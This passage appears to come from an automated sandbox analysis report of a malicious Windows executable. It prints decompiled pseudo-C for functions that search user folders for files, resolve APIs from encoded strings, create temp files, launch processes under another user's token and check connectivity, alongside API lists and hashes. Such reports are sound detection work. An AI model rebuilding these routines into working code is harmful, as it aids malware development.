				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E004159A4(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E004164D4( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0041BB58( &_v580,  &_v16, _t37, 1, 2, E00414BAB,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E00416421(_v12);
				}
				return E0041252D(_t29, _v12, 0xcb);
			}

0x00414e45
0x00414e4d
0x00414e56
0x00414e60
0x00414e67
0x00414e6e
0x00414e75
0x00414e7a
0x00414e7c
0x00414e7c
0x00414e8a
0x00414e90
0x00414e92
0x00414ea4
0x00414ead
0x00414ead
0x00414eb2
0x00414eb3
0x00414ebb
0x00000000
0x00414ed4
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00414E8A

Part of subcall function 0041BB58: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB97
Part of subcall function 0041BB58: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BBBE
Part of subcall function 0041BB58: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BC08
Part of subcall function 0041BB58: Sleep.KERNEL32(00000000,?,?), ref: 0041BC65
Part of subcall function 0041BB58: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC93
Part of subcall function 0041BB58: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BCA5

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

Strings

&, xrefs: 00414E60
#, xrefs: 00414E6E

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 0e142752edf9faea051dfd1475f9757745264393bdf95e09941ae8ea1e8dbdf1
Instruction ID: ad54cb6dfae81f3488c63cb24e4edfd813e54fb3884ebddcf43ce1e205ebdd58
Opcode Fuzzy Hash: 0e142752edf9faea051dfd1475f9757745264393bdf95e09941ae8ea1e8dbdf1
Instruction Fuzzy Hash: B5117075901228BADB209B96DC49FDFBF78EF81314F00405AF609A7180D3785AC5CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406D97, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00406D97(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E004159A4(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E0041596E(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E004159A4(0xd5,  &_v92);
					_push(0x1e6);
					_push("0xB268B1AD");
					if(E0041718F( &_v8, _t32, 0x1050809) > 0) {
						 *_t28(0, _v8, "#", 0x10040);
						E00416421(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

0x00406d9e
0x00406da6
0x00406db4
0x00406db8
0x00406dbf
0x00406dc7
0x00406dd6
0x00406dda
0x00406e0f
0x00406e0f
0x00406e2e
0x00000000
0x00406e2e
0x00406ddc
0x00406de0
0x00406de8
0x00406ded
0x00406df2
0x00406e0d
0x00406e22
0x00406e27
0x00406e2c
0x00000000
0x00406e2c
0x00000000
0x00406e0d
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 00406DAE
GetProcAddress.KERNEL32(00000000,?), ref: 00406DD0

Strings

0xB268B1AD, xrefs: 00406DF2

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0xB268B1AD
API String ID: 1646373207-1532168515
Opcode ID: e5bee13c06fd1d6849110fb696735ec403fb43aaaa9d4694e8bdb8134a290847
Instruction ID: 444c42f79a14df9c0cf1b00b2653f1ed534b3c6cb381334ca6a16cfdf4d7cb6b
Opcode Fuzzy Hash: e5bee13c06fd1d6849110fb696735ec403fb43aaaa9d4694e8bdb8134a290847
Instruction Fuzzy Hash: 2E01F57AA40714B7CB1166A6CC06BDF3B2CDF80755F11006AFD01FB284DA7CCA1595E9

Uniqueness

Uniqueness Score: -1.00%

Function 00406AB8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00406AB8(void* __ecx, WCHAR* __edi, void* __esi, signed int _a4) {
				char _v104;
				char _v154;
				char _v174;
				char _v194;
				char _v592;
				signed int _t13;
				int _t15;
				WCHAR* _t18;
				char* _t21;
				WCHAR* _t22;
				void* _t23;

				_t23 = __esi;
				_t22 = __edi;
				 *__edi = 0;
				E00406A66(__ecx,  &_v592);
				_t13 = _a4;
				if(_t13 == 0) {
					L6:
					_t21 =  &_v174;
					goto L7;
				} else {
					_t13 = _t13 - 1;
					if(_t13 == 0) {
						_t21 =  &_v194;
						L7:
						_t18 = 0x4229a0;
						goto L8;
					} else {
						_t13 = _t13 - 1;
						if(_t13 == 0) {
							goto L6;
						} else {
							_t15 = _t13 - 1;
							if(_t15 == 0) {
								_t18 = L"SOFTWARE\\Microsoft";
								_t21 =  &_v154;
								L8:
								_push(_t23);
								_t15 = E0041662C(_t13 | 0xffffffff, _t21,  &_v104, 0, 0x32);
								if(_t15 != 0) {
									_t15 = E0041BCB4( &_v104, _t22, _t18);
									if(_t15 == 0) {
										L12:
										_t15 = 0;
										 *_t22 = 0;
									} else {
										if(_a4 == 0) {
											_t15 = PathRenameExtensionW(_t22, L".dat");
											if(_t15 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t15;
			}

0x00406ab8
0x00406ab8
0x00406ac3
0x00406ace
0x00406ad6
0x00406ad9
0x00406af9
0x00406af9
0x00000000
0x00406adb
0x00406adb
0x00406adc
0x00406af1
0x00406aff
0x00406aff
0x00000000
0x00406ade
0x00406ade
0x00406adf
0x00000000
0x00406ae1
0x00406ae1
0x00406ae2
0x00406ae4
0x00406ae9
0x00406b04
0x00406b04
0x00406b0f
0x00406b17
0x00406b1e
0x00406b25
0x00406b3d
0x00406b3d
0x00406b3f
0x00406b27
0x00406b2b
0x00406b33
0x00406b3b
0x00000000
0x00000000
0x00406b3b
0x00406b2b
0x00406b25
0x00406b17
0x00406ae2
0x00406adf
0x00406adc
0x00406b44

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,004229A0,00000032,77E49EB0,?,00000000), ref: 00406B33

Strings

.dat, xrefs: 00406B2D
SOFTWARE\Microsoft, xrefs: 00406AE4

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft
API String ID: 3337224433-47915998
Opcode ID: 7346056e7a3c2a0fba0c0708040a9bca038319059d625d2debf8e60216a4544a
Instruction ID: 6a00dad349256d433c9dfd404ca64af83f46a783f60c26087ee0cbca6850d75d
Opcode Fuzzy Hash: 7346056e7a3c2a0fba0c0708040a9bca038319059d625d2debf8e60216a4544a
Instruction Fuzzy Hash: 8101D2702002199ACB20EBB4C840BEBB778EF01340F51807BA906F21C0E778AE94DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7A6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041B7A6(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E0041775A());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E00417114(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E0041BCB4(_t19, _a8,  &_v524) == 0 || E0041B5DA(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0041b7c9
0x0041b823
0x00000000
0x0041b823
0x0041b7cb
0x0041b7cd
0x0041b7cd
0x0041b7d5
0x0041b7d6
0x0041b7e5
0x0041b7eb
0x0041b7f0
0x0041b7f6
0x00000000
0x00000000
0x0041b80b
0x0041b81d
0x0041b821
0x00000000
0x00000000
0x00000000
0x0041b82b
0x00000000
0x0041b82b
0x0041b80b
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0041B7BD

Part of subcall function 0041775A: GetTickCount.KERNEL32 ref: 0041775A

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

Part of subcall function 0041B5DA: CreateFileW.KERNEL32(00417EFB,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B5F4
Part of subcall function 0041B5DA: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B617
Part of subcall function 0041B5DA: CloseHandle.KERNEL32(00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B624

Strings

%s%08x.%s, xrefs: 0041B7DB
tmp, xrefs: 0041B7D6

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: 0ba05265954f171b37d69a34f707c3ba3af3ad0a2de1d9a09da13306e5a98e78
Instruction ID: 7c5fff95fd9387a5440838fff514b9380cb5b80794eb81717ca26ee4bbc93f84
Opcode Fuzzy Hash: 0ba05265954f171b37d69a34f707c3ba3af3ad0a2de1d9a09da13306e5a98e78
Instruction Fuzzy Hash: 4E01267114021826EA203A208D42BFF7728DB41B54F1041B3FE25B61D2C3798DC6C6EC

Uniqueness

Uniqueness Score: -1.00%

Function 00419FF5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419FF5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0041B785( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E004165A0(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E0041645D(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x0041a009
0x0041a01f
0x0041a039
0x0041a03f
0x0041a053
0x0041a060
0x0041a067
0x0041a06b
0x0041a06c
0x0041a071

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0041A017

Part of subcall function 0041B785: SetFileAttributesW.KERNEL32(00000080,00000080,0040C774,?), ref: 0041B78E
Part of subcall function 0041B785: DeleteFileW.KERNEL32(?), ref: 0041B798

PathFindFileNameW.SHLWAPI(?,?,?), ref: 0041A039

Part of subcall function 004165A0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00417298,00000000,00000000,00000000,004165FD,00000000,00000000,00000000,?,00000000), ref: 004165BB

Strings

cab, xrefs: 0041A00C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: 2e14a54aa504a7c25fa81943960b87abd01cf3a2ebc93f3ed310c45bfc680ef0
Instruction ID: 08eddc06e61a59b83702d710fe7114b423ef6bde4a38add2f9f4f3b96c44e801
Opcode Fuzzy Hash: 2e14a54aa504a7c25fa81943960b87abd01cf3a2ebc93f3ed310c45bfc680ef0
Instruction Fuzzy Hash: DE01DB72A0021467CB209BA8DC49FC777AC9F45755F0402527A69F31D2D674E9448694

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6CE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040E6CE(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E00419B10(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E0041718F( &_a4, L"\"%s\"", _a16) > 0) {
								E00417D43(_t27, _a4);
								E00416421(_a4);
							}
						}
						E00416421(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x0040e6d8
0x0040e6dd
0x0040e6e8
0x0040e6ec
0x0040e6fb
0x0040e701
0x0040e717
0x0040e71d
0x0040e725
0x0040e725
0x0040e72a
0x0040e72c
0x0040e72c
0x00000000
0x0040e73a
0x0040e73c

APIs

Part of subcall function 00419B10: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,00417A5A,?,?,?,004065BC,000000FF,00422950), ref: 00419B29
Part of subcall function 00419B10: GetLastError.KERNEL32(?,?,00417A5A,?,?,?,004065BC,000000FF,00422950,?,?,00000000), ref: 00419B2F
Part of subcall function 00419B10: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00417A5A,?,?,?,004065BC,000000FF,00422950), ref: 00419B55

EqualSid.ADVAPI32(00000000,0040E847,?,0040E847,?,?,00000000), ref: 0040E6F3

Part of subcall function 00417D43: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00417D54
Part of subcall function 00417D43: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00417D73
Part of subcall function 00417D43: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00417D7F
Part of subcall function 00417D43: CreateProcessAsUserW.ADVAPI32(?,00000000,0040E722,00000000,00000000,00000000,0040E722,0040E722,00000000,?,?,?,00000000,00000044), ref: 00417DF0
Part of subcall function 00417D43: CloseHandle.KERNEL32(?), ref: 00417E03
Part of subcall function 00417D43: CloseHandle.KERNEL32(?), ref: 00417E08
Part of subcall function 00417D43: FreeLibrary.KERNEL32(?), ref: 00417E1F

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

CloseHandle.KERNEL32(?,?,0040E847,?,?,00000000), ref: 0040E734

Strings

"%s", xrefs: 0040E707

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: cbbd66676f0c9926ba23e0351f81f764ec975333b75f8e8fc24c2e06a2cd1ef5
Instruction ID: 1c54e54367483d5df6a15ad46610ffb137875d47fb8a70796a7fb94628ec302f
Opcode Fuzzy Hash: cbbd66676f0c9926ba23e0351f81f764ec975333b75f8e8fc24c2e06a2cd1ef5
Instruction Fuzzy Hash: 0DF08135100109BBCF016F62EC45DDF3F29EF84391B10843AFD08AA161DB39DA60DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004184EA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184EA(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t26;

				_t26 = 0;
				_v56 = 0x101;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E00418469();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E00418337( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E00416421(_v44);
				return _t26;
			}

0x004184f2
0x004184f5
0x004184fb
0x004184fe
0x0041850c
0x0041850f
0x00418516
0x00418519
0x0041851c
0x0041851f
0x00418522
0x00418525
0x0041852c
0x00418535
0x0041853f
0x00418545
0x00418545
0x0041854b
0x00418556

APIs

Part of subcall function 00418469: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0041847A
Part of subcall function 00418469: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0041848D
Part of subcall function 00418469: FreeLibrary.KERNEL32(?), ref: 004184DF

GetTickCount.KERNEL32 ref: 0041852F

Part of subcall function 00418337: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 0041838B
Part of subcall function 00418337: InternetCloseHandle.WININET(00000000), ref: 00418424

GetTickCount.KERNEL32 ref: 00418541

Strings

http://www.google.com/webhp, xrefs: 0041850F

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: 35b7e05fa67d69dacd93531c99f0a69a09a945f26311f9131be05dc26fbb8216
Instruction ID: cc6d0f838ea9cfcd110650bcb5f79b12505634ac5046a745f05f73d80ac47241
Opcode Fuzzy Hash: 35b7e05fa67d69dacd93531c99f0a69a09a945f26311f9131be05dc26fbb8216
Instruction Fuzzy Hash: 1701C4B1D11228AACB009FE9D9454DEBBB8AF08748F10406BE800B7210D7B45A458B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041775A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041775A() {
				unsigned int __esi;
				signed int _t25;
				signed int _t61;
				signed int* _t65;
				signed int _t66;

				if(GetTickCount() !=  *0x423568) {
					__ecx = 0;
					 *0x423568 = __eax;
					 *0x423570 = __eax;
					__ecx = 1;
					__eax = 0x423570;
					do {
						__edx =  *__eax;
						__edx = __edx >> 0x1e;
						__edx >> 0x0000001e ^ __edx = (__edx >> 0x0000001e ^ __edx) * 0x6c078965;
						__esi = (__edx >> 0x0000001e ^ __edx) * 0x6c078965 + __ecx;
						__eax[1] = (__edx >> 0x0000001e ^ __edx) * 0x6c078965 + __ecx;
						__eax =  &(__eax[1]);
						__ecx = __ecx + 1;
					} while (__eax < 0x423f2c);
					 *0x423f3c = __ecx;
				}
				_t25 =  *0x423f3c;
				if(_t25 >= 0x270) {
					_t66 = 0;
					do {
						_t61 = _t66;
						_t66 = _t66 + 1;
						0x423570[_t61] = (( *(0x423574 + _t61 * 4) ^ 0x423570[_t61]) & 0x7fffffff ^ 0x423570[_t61]) >> 0x00000001 ^  *(0x4223a0 + ((( *(0x423574 + _t61 * 4) ^ 0x423570[_t61]) & 0x7fffffff ^ 0x423570[_t61]) & 0x00000001) * 4) ^  *(0x423ba4 + _t61 * 4);
					} while (_t66 < 0xe3);
					if(_t66 < 0x26f) {
						_t65 =  &(0x423570[_t66]);
						do {
							 *_t65 =  *(0x4223a0 + ((( *_t65 ^ _t65[1]) & 0x7fffffff ^  *_t65) & 0x00000001) * 4) ^  *(_t65 - 0x38c) ^ (( *_t65 ^ _t65[1]) & 0x7fffffff ^  *_t65) >> 0x00000001;
							_t65 =  &(_t65[1]);
						} while (_t65 < 0x423f2c);
					}
					 *0x423f2c = (( *0x423570 ^  *0x423f2c) & 0x7fffffff ^  *0x423f2c) >> 0x00000001 ^  *(0x4223a0 + ((( *0x423570 ^  *0x423f2c) & 0x7fffffff ^  *0x423f2c) & 0x00000001) * 4) ^  *0x423ba0;
					_t25 = 0;
				}
				 *0x423f3c = _t25 + 1;
				return (0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b ^ ((0x423570[_t25] ^ 0x423570[_t25] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x00417766
0x00417768
0x0041776a
0x0041776f
0x00417774
0x00417775
0x0041777b
0x0041777b
0x0041777f
0x00417784
0x0041778a
0x0041778c
0x0041778f
0x00417792
0x00417793
0x0041779a
0x004177a0
0x004175d2
0x004175dc
0x004175e4
0x004175eb
0x004175eb
0x00417619
0x0041761a
0x00417621
0x0041762f
0x00417631
0x00417638
0x00417657
0x00417659
0x0041765c
0x00417638
0x0041768b
0x00417690
0x00417690
0x0041769a
0x004176c5

APIs

GetTickCount.KERNEL32 ref: 0041775A

Strings

,?B, xrefs: 00417793
p5B, xrefs: 00417775

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick
String ID: ,?B$p5B
API String ID: 536389180-53248244
Opcode ID: 6f717adb3fb122f250c544fd4b7140c28e61e267eab53f0ba6e6512e92fb66ca
Instruction ID: 32e6a462c1c3d9d1d55db56c81ca5dca802e5fae6257ca50784b646dc323a44a
Opcode Fuzzy Hash: 6f717adb3fb122f250c544fd4b7140c28e61e267eab53f0ba6e6512e92fb66ca
Instruction Fuzzy Hash: 73E01B72E18120AF9328CF19B54545576F4E649345356827BE40EE7371E73C99C38F8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4DD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A4DD(signed char* __esi, long _a4, _Unknown_base(*)()* _a8, char _a12) {
				void* _t9;

				if( *__esi < 0x40) {
					if(_a8 == 0) {
						L6:
						return 1;
					}
					_t2 =  &_a12; // 0x422838
					_t9 = CreateThread(0, _a4, _a8,  *_t2, 0, 0);
					if(_t9 == 0) {
						L2:
						return 0;
					}
					__esi[4 + ( *__esi & 0x000000ff) * 4] = _t9;
					 *__esi =  *__esi + 1;
					goto L6;
				}
				SetLastError(0x9b);
				goto L2;
			}

0x0041a4e0
0x0041a4f6
0x0041a51d
0x00000000
0x0041a51d
0x0041a4fc
0x0041a50a
0x0041a512
0x0041a4ed
0x00000000
0x0041a4ed
0x0041a517
0x0041a51b
0x00000000
0x0041a51b
0x0041a4e7
0x00000000

APIs

SetLastError.KERNEL32(0000009B,00406D57,00000000,004159EE,00000000,00422838,00000000,00000104,74B5F560,00000000), ref: 0041A4E7
CreateThread.KERNEL32 ref: 0041A50A

Strings

8(B, xrefs: 0041A4FC

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastThread
String ID: 8(B
API String ID: 1689873465-280421164
Opcode ID: 81a221aa79ac654a3d13ddf4a8d736319d9eb13d262342f35a50137733f20339
Instruction ID: 6f7e4ad42fc3e77c629095f89d8deef1d19042d5eadc55cffe25330061af76c1
Opcode Fuzzy Hash: 81a221aa79ac654a3d13ddf4a8d736319d9eb13d262342f35a50137733f20339
Instruction Fuzzy Hash: BDE09275108382BAEB215F24AB08B6ABFD16F19B01F50485EF3C1651E1C3B940A8DB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00414BAB, Relevance: 5.2, APIs: 4, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00414BAB(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t82;
				char* _t83;
				intOrPtr _t85;
				char** _t101;
				char* _t112;
				char* _t121;
				char* _t122;
				void* _t123;
				char* _t126;
				char* _t127;
				char* _t156;
				void* _t157;
				signed int _t166;
				char* _t167;
				char** _t168;
				intOrPtr _t170;
				char* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x294;
				if(E0041BCB4( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t177 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t82 = 2;
					_t83 = E0041B63F(_t82,  &_v524,  &_v612);
					__eflags = _t83;
					if(_t83 == 0) {
						goto L31;
					}
					_t85 = E00416CBC(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t85;
					__eflags = _t85 - 0xffffffff;
					if(_t85 == 0xffffffff) {
						L30:
						E0041B6E7( &_v612);
						goto L31;
					}
					_v640 = E004163F1(0x622);
					E0041596E(0x91,  &_v588);
					E0041596E(0x92,  &_v628);
					E0041596E(0x93,  &_v620);
					E0041596E(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E00416421(_v640);
						E0041643D(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t166 = _v644;
							_t101 = _v652;
							__eflags =  *(_t101 + _t166 * 4);
							if( *(_t101 + _t166 * 4) == 0) {
								goto L28;
							}
